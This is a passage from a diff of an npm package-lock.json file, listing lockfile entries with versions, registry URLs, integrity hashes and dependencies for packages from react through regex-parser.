"2.0.0", + "iconv-lite": "0.4.24", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/react": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz", + "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-async-script": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/react-async-script/-/react-async-script-1.2.0.tgz", + "integrity": "sha512-bCpkbm9JiAuMGhkqoAiC0lLkb40DJ0HOEJIku+9JDjxX3Rcs+ztEOG13wbrOskt3n2DTrjshhaQ/iay+SnGg5Q==", + "dev": true, + "dependencies": { + "hoist-non-react-statics": "^3.3.0", + "prop-types": "^15.5.0" + }, + "peerDependencies": { + "react": ">=16.4.1" + } + }, + "node_modules/react-chartjs-2": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/react-chartjs-2/-/react-chartjs-2-5.0.1.tgz", + "integrity": "sha512-u38C9OxynlNCBp+79grgXRs7DSJ9w8FuQ5/HO5FbYBbri8HSZW+9SWgjVshLkbXBfXnMGWakbHEtvN0nL2UG7Q==", + "dev": true, + "peerDependencies": { + "chart.js": "^4.0.0", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0" + } + }, + "node_modules/react-color": { + "version": "2.19.3", + "resolved": "https://registry.npmjs.org/react-color/-/react-color-2.19.3.tgz", + "integrity": "sha512-LEeGE/ZzNLIsFWa1TMe8y5VYqr7bibneWmvJwm1pCn/eNmrabWDh659JSPn9BuaMpEfU83WTOJfnCcjDZwNQTA==", + "dev": true, + "dependencies": { + "@icons/material": "^0.2.4", + "lodash": "^4.17.15", + "lodash-es": "^4.17.15", + "material-colors": "^1.2.1", + "prop-types": "^15.5.10", + "reactcss": "^1.2.0", + "tinycolor2": "^1.4.1" + }, + "peerDependencies": { + "react": "*" + } + }, + "node_modules/react-deep-force-update": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/react-deep-force-update/-/react-deep-force-update-1.1.2.tgz", + "integrity": "sha512-WUSQJ4P/wWcusaH+zZmbECOk7H5N2pOIl0vzheeornkIMhu+qrNdGFm0bDZLCb0hSF0jf/kH1SgkNGfBdTc4wA==", + "dev": true + }, + "node_modules/react-dnd": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/react-dnd/-/react-dnd-16.0.1.tgz", + "integrity": "sha512-QeoM/i73HHu2XF9aKksIUuamHPDvRglEwdHL4jsp784BgUuWcg6mzfxT0QDdQz8Wj0qyRKx2eMg8iZtWvU4E2Q==", + "dev": true, + "dependencies": { + "@react-dnd/invariant": "^4.0.1", + "@react-dnd/shallowequal": "^4.0.1", + "dnd-core": "^16.0.1", + "fast-deep-equal": "^3.1.3", + "hoist-non-react-statics": "^3.3.2" + }, + "peerDependencies": { + "@types/hoist-non-react-statics": ">= 3.3.1", + "@types/node": ">= 12", + "@types/react": ">= 16", + "react": ">= 16.14" + }, + "peerDependenciesMeta": { + "@types/hoist-non-react-statics": { + "optional": true + }, + "@types/node": { + "optional": true + }, + "@types/react": { + "optional": true + } + } + }, + "node_modules/react-dnd-html5-backend": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/react-dnd-html5-backend/-/react-dnd-html5-backend-16.0.1.tgz", + "integrity": "sha512-Wu3dw5aDJmOGw8WjH1I1/yTH+vlXEL4vmjk5p+MHxP8HuHJS1lAGeIdG/hze1AvNeXWo/JgULV87LyQOr+r5jw==", + "dev": true, + "dependencies": { + "dnd-core": "^16.0.1" + } + }, + "node_modules/react-docgen": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/react-docgen/-/react-docgen-7.1.1.tgz", + "integrity": "sha512-hlSJDQ2synMPKFZOsKo9Hi8WWZTC7POR8EmWvTSjow+VDgKzkmjQvFm2fk0tmRw+f0vTOIYKlarR0iL4996pdg==", + "dev": true, + "license": "MIT", + "dependencies": { + 
"@babel/core": "^7.18.9", + "@babel/traverse": "^7.18.9", + "@babel/types": "^7.18.9", + "@types/babel__core": "^7.18.0", + "@types/babel__traverse": "^7.18.0", + "@types/doctrine": "^0.0.9", + "@types/resolve": "^1.20.2", + "doctrine": "^3.0.0", + "resolve": "^1.22.1", + "strip-indent": "^4.0.0" + }, + "engines": { + "node": ">=16.14.0" + } + }, + "node_modules/react-docgen-typescript": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/react-docgen-typescript/-/react-docgen-typescript-2.2.2.tgz", + "integrity": "sha512-tvg2ZtOpOi6QDwsb3GZhOjDkkX0h8Z2gipvTg6OVMUyoYoURhEiRNePT8NZItTVCDh39JJHnLdfCOkzoLbFnTg==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "typescript": ">= 4.3.x" + } + }, + "node_modules/react-dom": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz", + "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1", + "scheduler": "^0.20.2" + }, + "peerDependencies": { + "react": "17.0.2" + } + }, + "node_modules/react-error-boundary": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/react-error-boundary/-/react-error-boundary-2.3.2.tgz", + "integrity": "sha512-ZMzi7s4pj/6A/6i9RS4tG7g1PdF2Rgr4/7FTQ8sbKHex19uNji0j+xq0OS//c6TUgQRKoL6P51BNNNFmYpRMhw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.11.2" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + }, + "peerDependencies": { + "react": ">=16.13.1" + } + }, + "node_modules/react-fast-compare": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/react-fast-compare/-/react-fast-compare-2.0.4.tgz", + "integrity": "sha512-suNP+J1VU1MWFKcyt7RtjiSWUjvidmQSlqu+eHslq+342xCbGTYmC0mEhPCOHxlW0CywylOC1u2DFAT+bv4dBw==", + "dev": true + }, + "node_modules/react-google-recaptcha": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/react-google-recaptcha/-/react-google-recaptcha-3.1.0.tgz", + "integrity": "sha512-cYW2/DWas8nEKZGD7SCu9BSuVz8iOcOLHChHyi7upUuVhkpkhYG/6N3KDiTQ3XAiZ2UAZkfvYKMfAHOzBOcGEg==", + "dev": true, + "dependencies": { + "prop-types": "^15.5.0", + "react-async-script": "^1.2.0" + }, + "peerDependencies": { + "react": ">=16.4.1" + } + }, + "node_modules/react-i18next": { + "version": "13.3.1", + "resolved": "https://registry.npmjs.org/react-i18next/-/react-i18next-13.3.1.tgz", + "integrity": "sha512-JAtYREK879JXaN9GdzfBI4yJeo/XyLeXWUsRABvYXiFUakhZJ40l+kaTo+i+A/3cKIED41kS/HAbZ5BzFtq/Og==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.22.5", + "html-parse-stringify": "^3.0.1" + }, + "peerDependencies": { + "i18next": ">= 23.2.3", + "react": ">= 16.8.0" + }, + "peerDependenciesMeta": { + "react-dom": { + "optional": true + }, + "react-native": { + "optional": true + } + } + }, + "node_modules/react-is": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-17.0.2.tgz", + "integrity": "sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==" + }, + "node_modules/react-lifecycles-compat": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/react-lifecycles-compat/-/react-lifecycles-compat-3.0.4.tgz", + "integrity": "sha512-fBASbA6LnOU9dOU2eW7aQ8xmYBSXUIWr+UmF9b1efZBazGNO+rcXT/icdKnYm2pTwcRylVUYwW7H1PHfLekVzA==", + "dev": true + }, + "node_modules/react-linkify": { + "version": "1.0.0-alpha", + "resolved": 
"https://registry.npmjs.org/react-linkify/-/react-linkify-1.0.0-alpha.tgz", + "integrity": "sha512-7gcIUvJkAXXttt1fmBK9cwn+1jTa4hbKLGCZ9J1U6EOkyb2/+LKL1Z28d9rtDLMnpvImlNlLPdTPooorl5cpmg==", + "dev": true, + "dependencies": { + "linkify-it": "^2.0.3", + "tlds": "^1.199.0" + } + }, + "node_modules/react-linkify/node_modules/linkify-it": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/linkify-it/-/linkify-it-2.2.0.tgz", + "integrity": "sha512-GnAl/knGn+i1U/wjBz3akz2stz+HrHLsxMwHQGofCDfPvlf+gDKN58UtfmUquTY4/MXeE2x7k19KQmeoZi94Iw==", + "dev": true, + "dependencies": { + "uc.micro": "^1.0.1" + } + }, + "node_modules/react-proxy": { + "version": "1.1.8", + "resolved": "https://registry.npmjs.org/react-proxy/-/react-proxy-1.1.8.tgz", + "integrity": "sha512-46GkBpZD97R/vV+iw+u6aFACzIHOst9gCl41d5K5vepPBz2i2gqHmXQJWKXsrUsSOdylKahN3sd9taswFN8Wzw==", + "dev": true, + "dependencies": { + "lodash": "^4.6.1", + "react-deep-force-update": "^1.0.0" + } + }, + "node_modules/react-redux": { + "version": "7.2.9", + "resolved": "https://registry.npmjs.org/react-redux/-/react-redux-7.2.9.tgz", + "integrity": "sha512-Gx4L3uM182jEEayZfRbI/G11ZpYdNAnBs70lFVMNdHJI76XYtR+7m0MN+eAs7UHBPhWXcnFPaS+9owSCJQHNpQ==", + "dependencies": { + "@babel/runtime": "^7.15.4", + "@types/react-redux": "^7.1.20", + "hoist-non-react-statics": "^3.3.2", + "loose-envify": "^1.4.0", + "prop-types": "^15.7.2", + "react-is": "^17.0.2" + }, + "peerDependencies": { + "react": "^16.8.3 || ^17 || ^18" + }, + "peerDependenciesMeta": { + "react-dom": { + "optional": true + }, + "react-native": { + "optional": true + } + } + }, + "node_modules/react-refresh": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/react-refresh/-/react-refresh-0.14.0.tgz", + "integrity": "sha512-wViHqhAd8OHeLS/IRMJjTSDHF3U9eWi62F/MledQGPdJGDhodXJ9PBLNGr6WWL7qlH12Mt3TyTpbS+hGXMjCzQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-resizable-panels": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/react-resizable-panels/-/react-resizable-panels-2.1.1.tgz", + "integrity": "sha512-+cUV/yZBYfiBj+WJtpWDJ3NtR4zgDZfHt3+xtaETKE+FCvp+RK/NJxacDQKxMHgRUTSkfA6AnGljQ5QZNsCQoA==", + "dev": true, + "peerDependencies": { + "react": "^16.14.0 || ^17.0.0 || ^18.0.0", + "react-dom": "^16.14.0 || ^17.0.0 || ^18.0.0" + } + }, + "node_modules/react-responsive": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/react-responsive/-/react-responsive-10.0.0.tgz", + "integrity": "sha512-N6/UiRLGQyGUqrarhBZmrSmHi2FXSD++N5VbSKsBBvWfG0ZV7asvUBluSv5lSzdMyEVjzZ6Y8DL4OHABiztDOg==", + "dependencies": { + "hyphenate-style-name": "^1.0.0", + "matchmediaquery": "^0.4.2", + "prop-types": "^15.6.1", + "shallow-equal": "^3.1.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/react-router": { + "version": "6.26.1", + "resolved": "https://registry.npmjs.org/react-router/-/react-router-6.26.1.tgz", + "integrity": "sha512-kIwJveZNwp7teQRI5QmwWo39A5bXRyqpH0COKKmPnyD2vBvDwgFXSqDUYtt1h+FEyfnE8eXr7oe0MxRzVwCcvQ==", + "dependencies": { + "@remix-run/router": "1.19.1" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": ">=16.8" + } + }, + "node_modules/react-router-dom": { + "version": "6.26.1", + "resolved": "https://registry.npmjs.org/react-router-dom/-/react-router-dom-6.26.1.tgz", + "integrity": "sha512-veut7m41S1fLql4pLhxeSW3jlqs+4MtjRLj0xvuCEXsxusJCbs6I8yn9BxzzDX2XDgafrccY6hwjmd/bL54tFw==", + "dependencies": { + 
"@remix-run/router": "1.19.1", + "react-router": "6.26.1" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": ">=16.8", + "react-dom": ">=16.8" + } + }, + "node_modules/react-transform-hmr": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/react-transform-hmr/-/react-transform-hmr-1.0.4.tgz", + "integrity": "sha512-8bK1DWUZynE6swD2jNPbzO5mvhB8fs9Ub5GksoVqYkc9i06FdSLC36qQYjaKOW79KBdsROq2cK0tRKITiEzmyg==", + "dev": true, + "dependencies": { + "global": "^4.3.0", + "react-proxy": "^1.1.7" + } + }, + "node_modules/reactcss": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/reactcss/-/reactcss-1.2.3.tgz", + "integrity": "sha512-KiwVUcFu1RErkI97ywr8nvx8dNOpT03rbnma0SSalTYjkrPYaEajR4a/MRt6DZ46K6arDRbWMNHF+xH7G7n/8A==", + "dev": true, + "dependencies": { + "lodash": "^4.0.1" + } + }, + "node_modules/read": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/read/-/read-1.0.7.tgz", + "integrity": "sha1-s9oZvQUkMal2cdRKQmNK33ELQMQ=", + "dependencies": { + "mute-stream": "~0.0.4" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/read-cache": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz", + "integrity": "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==", + "dev": true, + "dependencies": { + "pify": "^2.3.0" + } + }, + "node_modules/read-pkg": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/read-pkg/-/read-pkg-5.2.0.tgz", + "integrity": "sha512-Ug69mNOpfvKDAc2Q8DRpMjjzdtrnv9HcSMX+4VsZxD1aZ6ZzrIE7rlzXBtWTyhULSMKg076AW6WR5iZpD0JiOg==", + "dev": true, + "dependencies": { + "@types/normalize-package-data": "^2.4.0", + "normalize-package-data": "^2.5.0", + "parse-json": "^5.0.0", + "type-fest": "^0.6.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/read-pkg-up/-/read-pkg-up-7.0.1.tgz", + "integrity": "sha512-zK0TB7Xd6JpCLmlLmufqykGE+/TlOePD6qKClNW7hHDKFh/J7/7gCWGR7joEQEW1bKq3a3yUZSObOoWLFQ4ohg==", + "dev": true, + "dependencies": { + "find-up": "^4.1.0", + "read-pkg": "^5.2.0", + "type-fest": "^0.8.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/read-pkg-up/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + 
"node_modules/read-pkg-up/node_modules/p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up/node_modules/type-fest": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.8.1.tgz", + "integrity": "sha512-4dbzIzqvjtgiM5rw1k5rEHtBANKmdudhGyBEajN01fEyhaAIhsoKNy6y7+IN93IfpFtwY9iqi7kD+xwKhQsNJA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg/node_modules/type-fest": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.6.0.tgz", + "integrity": "sha512-q+MB8nYR1KDLrgr4G5yemftpMC7/QLqVndBmEEdqzmNj5dcFOO4Oo8qlwZE3ULT3+Zim1F8Kq4cBnikNhlCMlg==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/readable-stream": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.0.tgz", + "integrity": "sha512-BViHy7LKeTz4oNnkcLJ+lVSL6vpiFeX6/d3oSH8zCW7UxP2onchk+vTGB143xuFjHS3deTgkKoXXymXqymiIdA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/readdir-glob": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/readdir-glob/-/readdir-glob-1.1.3.tgz", + "integrity": "sha512-v05I2k7xN8zXvPD9N+z/uhXPaj0sUFCe2rcWZIpBsqxfP7xXFQ0tipAd/wjj1YxWyWtUS5IDJpOG82JKt2EAVA==", + "dependencies": { + "minimatch": "^5.1.0" + } + }, + "node_modules/readdir-glob/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/readdir-glob/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/readdirp": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", + "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", + "dev": true, + "dependencies": { + "picomatch": "^2.2.1" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/recast": { + "version": "0.23.9", + "resolved": "https://registry.npmjs.org/recast/-/recast-0.23.9.tgz", + "integrity": "sha512-Hx/BGIbwj+Des3+xy5uAtAbdCyqK9y9wbBcDFDYanLS9JnMqf7OeF87HQwUimE87OEc72mr6tkKUKMBBL+hF9Q==", + "dev": true, + "dependencies": { + "ast-types": "^0.16.1", + "esprima": "~4.0.0", + "source-map": "~0.6.1", + "tiny-invariant": "^1.3.3", + "tslib": "^2.0.1" + }, + "engines": { + "node": ">= 4" + } + }, + "node_modules/rechoir": { + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/rechoir/-/rechoir-0.8.0.tgz", + "integrity": "sha512-/vxpCXddiX8NGfGO/mTafwjq4aFa/71pvamip0++IQk3zG8cbCj0fifNPrjjF1XMXUne91jL9OoxmdykoEtifQ==", + "dependencies": { + "resolve": "^1.20.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + 
"node_modules/recurly": { + "version": "4.12.0", + "resolved": "https://registry.npmjs.org/recurly/-/recurly-4.12.0.tgz", + "integrity": "sha512-pmsREYXBBPYYAqeurlAAmB7sNiYfRva5Imi+nxZ41QHDZsDWuM35Q4/TSouLy8HdEE+HPfB4XHHpGNjo2LAM+A==" + }, + "node_modules/redent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/redent/-/redent-3.0.0.tgz", + "integrity": "sha512-6tDA8g98We0zd0GvVeMT9arEOnTw9qM03L9cJXaCjrip1OO764RDBLBfrB4cwzNGDj5OA5ioymC9GkizgWJDUg==", + "dev": true, + "license": "MIT", + "dependencies": { + "indent-string": "^4.0.0", + "strip-indent": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/redent/node_modules/strip-indent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz", + "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "min-indent": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/redis": { + "version": "0.7.3", + "resolved": "https://registry.npmjs.org/redis/-/redis-0.7.3.tgz", + "integrity": "sha512-0Pgb0jOLfn6eREtEIRn/ifyZJjl2H+wUY4F/Pe7T4UhmoSrZ/1HU5ZqiBpDk8I8Wbyv2N5DpXKzbEtMj3drprg==", + "optional": true, + "engines": { + "node": "*" + } + }, + "node_modules/redis-commands": { + "version": "1.7.0", + "resolved": "https://registry.npmjs.org/redis-commands/-/redis-commands-1.7.0.tgz", + "integrity": "sha512-nJWqw3bTFy21hX/CPKHth6sfhZbdiHP6bTawSgQBlKOVRG7EZkfHbbHwQJnrE4vsQf0CMNE+3gJ4Fmm16vdVlQ==" + }, + "node_modules/redis-errors": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz", + "integrity": "sha1-62LSrbFeTq9GEMBK/hUpOEJQq60=", + "engines": { + "node": ">=4" + } + }, + "node_modules/redis-parser": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz", + "integrity": "sha1-tm2CjNyv5rS4pCin3vTGvKwxyLQ=", + "dependencies": { + "redis-errors": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/redlock": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/redlock/-/redlock-4.2.0.tgz", + "integrity": "sha512-j+oQlG+dOwcetUt2WJWttu4CZVeRzUrcVcISFmEmfyuwCVSJ93rDT7YSgg7H7rnxwoRyk/jU46kycVka5tW7jA==", + "dependencies": { + "bluebird": "^3.7.2" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/reduce": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/reduce/-/reduce-1.0.2.tgz", + "integrity": "sha512-xX7Fxke/oHO5IfZSk77lvPa/7bjMh9BuCk4OOoX5XTXrM7s0Z+MkPfSDfz0q7r91BhhGSs8gii/VEN/7zhCPpQ==", + "dev": true, + "dependencies": { + "object-keys": "^1.1.0" + } + }, + "node_modules/redux": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/redux/-/redux-4.2.1.tgz", + "integrity": "sha512-LAUYz4lc+Do8/g7aeRa8JkyDErK6ekstQaqWQrNRW//MY1TvCEpMtpTWvlQ+FPbWCx+Xixu/6SHt5N0HR+SB4w==", + "dependencies": { + "@babel/runtime": "^7.9.2" + } + }, + "node_modules/redux-logger": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/redux-logger/-/redux-logger-3.0.6.tgz", + "integrity": "sha512-JoCIok7bg/XpqA1JqCqXFypuqBbQzGQySrhFzewB7ThcnysTO30l4VCst86AuB9T9tuT03MAA56Jw2PNhRSNCg==", + "dependencies": { + "deep-diff": "^0.3.5" + } + }, + "node_modules/redux-mock-store": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/redux-mock-store/-/redux-mock-store-1.5.0.tgz", + "integrity": 
"sha512-8AN6ti8SeH28FZm/mz+E2sj2JoaFCDudswbeFrt4Rnbi4KmI/KXumbskY7caO52zAgsda+DIgKBc60MJJhnhbg==", + "deprecated": "breaking changes in minor version", + "dev": true, + "dependencies": { + "lodash.isplainobject": "^4.0.6" + }, + "peerDependencies": { + "redux": "*" + } + }, + "node_modules/redux-thunk": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/redux-thunk/-/redux-thunk-2.2.0.tgz", + "integrity": "sha512-OOFWh9mt/7i94QPq4IAxhSIUyfIJJRnk6pe1IwgXethQik3kyg1wuxVZZlW9QOmL5rP/MrwzV+Cb+/HBKlvM8Q==" + }, + "node_modules/referer-parser": { + "version": "0.0.4", + "resolved": "git+ssh://git@github.com/overleaf/nodejs-referer-parser.git#8b8b103762d05b7be4cfa2f810e1d408be67d7bb", + "integrity": "sha512-73u9iYlvAoOF3PuteH1Yl3hdIGcGefyyZbgcNcaF8gAnSrx/cHlgiht/AhbT+rcM0dv0bPo9NxBmTrR1jr8DMQ==", + "dependencies": { + "js-yaml": "^4.1.0" + } + }, + "node_modules/referrer-policy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/referrer-policy/-/referrer-policy-1.2.0.tgz", + "integrity": "sha512-LgQJIuS6nAy1Jd88DCQRemyE3mS+ispwlqMk3b0yjZ257fI1v9c+/p6SD5gP5FGyXUIgrNOAfmyioHwZtYv2VA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/reflect.getprototypeof": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reflect.getprototypeof/-/reflect.getprototypeof-1.0.4.tgz", + "integrity": "sha512-ECkTw8TmJwW60lOTR+ZkODISW6RQ8+2CL3COqtiJKLd6MmB45hN51HprHFziKLGkAuTGQhBb91V8cy+KHlaCjw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "get-intrinsic": "^1.2.1", + "globalthis": "^1.0.3", + "which-builtin-type": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/regenerate": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/regenerate/-/regenerate-1.4.2.tgz", + "integrity": "sha512-zrceR/XhGYU/d/opr2EKO7aRHUeiBI8qjtfHqADTwZd6Szfy16la6kqD0MIUs5z5hx6AaKa+PixpPrR289+I0A==", + "dev": true + }, + "node_modules/regenerate-unicode-properties": { + "version": "10.1.0", + "resolved": "https://registry.npmjs.org/regenerate-unicode-properties/-/regenerate-unicode-properties-10.1.0.tgz", + "integrity": "sha512-d1VudCLoIGitcU/hEg2QqvyGZQmdC0Lf8BqdOMXGFSvJP4bNV1+XqbPQeHHLD51Jh4QJJ225dlIFvY4Ly6MXmQ==", + "dev": true, + "dependencies": { + "regenerate": "^1.4.2" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/regenerator-runtime": { + "version": "0.13.11", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.13.11.tgz", + "integrity": "sha512-kY1AZVr2Ra+t+piVaJ4gxaFaReZVH40AKNo7UCX6W+dEwBo/2oZJzqfuN1qLq1oL45o56cPaTXELwrTh8Fpggg==" + }, + "node_modules/regenerator-transform": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/regenerator-transform/-/regenerator-transform-0.15.2.tgz", + "integrity": "sha512-hfMp2BoF0qOk3uc5V20ALGDS2ddjQaLrdl7xrGXvAIow7qeWRM2VA2HuCHkUKk9slq3VwEwLNK3DFBqDfPGYtg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.4" + } + }, + "node_modules/regex-not": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/regex-not/-/regex-not-1.0.2.tgz", + "integrity": "sha512-J6SDjUgDxQj5NusnOtdFxDwN/+HWykR8GELwctJ7mdqhcyy1xEc4SRFHUXvxTp661YaVKAjfRLZ9cCqS6tn32A==", + "dev": true, + "dependencies": { + "extend-shallow": "^3.0.2", + "safe-regex": "^1.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/regex-parser": { + "version": "2.3.0", + "resolved": 
